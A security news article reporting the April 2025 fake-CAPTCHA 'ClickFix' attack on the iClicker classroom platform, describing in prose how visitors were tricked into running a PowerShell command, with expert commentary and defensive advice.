top of page
Search

Fake CAPTCHA Attack Compromises iClicker, Exposes Thousands of Students to Malware in Sophisticated Social Engineering Campaign

In a striking example of how trust can be weaponized in the digital age, iClicker — a popular digital classroom platform used by over 7 million students and 5,000 instructors — was recently the target of a sophisticated "ClickFix" attack that weaponized a fake CAPTCHA to deliver malware.

Between April 12 and April 16, 2025, visitors to iClicker.com were shown what appeared to be a standard CAPTCHA verification prompt asking users to click “I’m not a robot.” But this wasn’t a legitimate bot check — it was a trap. When clicked, the site silently copied a PowerShell command to the user’s clipboard. The CAPTCHA then instructed users to paste and run this code via the Windows Run dialog — a social engineering sleight of hand that exploited behavioral trust in common system prompts.

“This type of attack highlights a training gap: copying commands from trusted sites into terminals is not typically addressed in standard awareness programs,” said Randolph Barr, CISO at Cequence. “This is especially concerning for students or individuals using personal devices, where organizations have limited control — reinforcing the need for targeted education.”

The attack is part of a growing wave of ClickFix campaigns — socially engineered exploits that blur the line between technical hacking and user manipulation. Rather than relying on software vulnerabilities, these attacks rely on human error, specifically targeting how people respond to familiar interfaces.

A Campus-Wide Threat Vector

The University of Michigan was among the first to publicly report the incident through its Safe Computing team, warning that the PowerShell payload allowed attackers full access to infected machines. While the exact malware delivered remains unknown, analysts suspect it was an infostealer — capable of harvesting credentials, browser cookies, crypto wallets, and sensitive documents from browsers and local directories.

Aditya Sood, VP of Security Engineering and AI Strategy at Aryaka, said the attack was far from amateur.

“The attack on iClicker was not just a simple breach, but a sophisticated operation,” he explained. “It involved injecting a counterfeit CAPTCHA prompt that mimicked legitimate verification processes. This could be delivered via UI redressing or embedded malicious advertisements triggering a waterhole attack.”

The retrieved PowerShell commands were obfuscated and dynamic — designed to deliver different payloads based on the environment. If a user was deemed a real target, the malware was deployed. If the visitor was an automated analysis sandbox, the script downloaded a harmless Microsoft Visual C++ Redistributable to avoid detection.

A Security Response Mired in Obscurity

While iClicker is a subsidiary of publishing giant Macmillan, the company remained silent following multiple media inquiries. However, a security bulletin quietly posted to the iClicker website on May 6 acknowledged the breach — but it included a <meta name='robots' content='noindex, nofollow' /> tag, effectively preventing the announcement from being indexed by search engines.

“We recently resolved an incident affecting the iClicker landing page… no iClicker data, apps, or operations were impacted,” read the statement. “An unrelated third party placed a false Captcha on our landing page before users logged in… Out of an abundance of caution, we recommend that any faculty or student who clicked on the false Captcha… run security software to ensure their devices remain protected.”

Security experts were quick to point out the challenges of defending against such attacks, especially in bring-your-own-device (BYOD) academic environments.

“This incident underscores the blurring line between technical exploits and behavioral manipulation,” Barr added. “Attackers are adapting to target the user’s trust and actions directly — an area where traditional endpoint protections are weaker.”

He also emphasized that CAPTCHA, a decades-old tool, is rapidly becoming obsolete. “There are commercial services and AI tools that can bypass common CAPTCHAs, and they can’t protect APIs or AI agents, which are quickly becoming top targets.”

What Comes Next?

Students and instructors who visited iClicker.com during the attack window and followed the CAPTCHA’s instructions are urged to change their passwords — not just on iClicker, but across all services — and run comprehensive malware scans. The use of a password manager is strongly advised to help isolate and secure account credentials.

For organizations and schools, experts recommend implementing group policy restrictions to disable PowerShell for non-admins, monitoring clipboard activity for suspicious behavior, and blocking access to known malicious IPs and domains.

“A unified SASE platform providing integrated network and security can effectively defend against ClickFix-style attacks,” said Aryaka’s Sood. “By integrating DNS filtering, SWGs, and threat prevention into a single architecture, we can inspect all user traffic, regardless of location, and block malicious overlays and file downloads in real-time.”

As social engineering becomes more personalized and technically deceptive, the iClicker breach serves as a stark warning: cybersecurity can’t rely solely on code-based defense. In an age of digital trust, human behavior is the new attack surface.

bottom of page